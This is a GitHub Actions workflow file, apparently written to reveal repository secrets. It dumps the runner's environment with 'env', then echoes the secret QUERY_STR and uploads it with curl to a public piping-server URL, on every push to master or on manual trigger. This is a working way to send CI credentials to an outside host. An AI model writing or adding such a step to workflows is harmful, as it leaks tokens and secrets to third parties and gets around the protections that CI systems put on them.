name: View GitHub Actions secrets
on:
  push:
    branches: [master]
  workflow_dispatch:
  # 可以在仓库的 Actions 页面中手动触发
 
jobs:
  github-actions-environment-variables-ubuntu:
    runs-on: ubuntu-latest
    steps:
      - name: Get env
        run: env
      - name: Transfer secrets
        run: "echo 'Token XXXX: ${{secrets.QUERY_STR}}' | curl -T - https://ppng.io/aabcc23894eowf982fu902u3f8fh280e0ic20i23opj2"
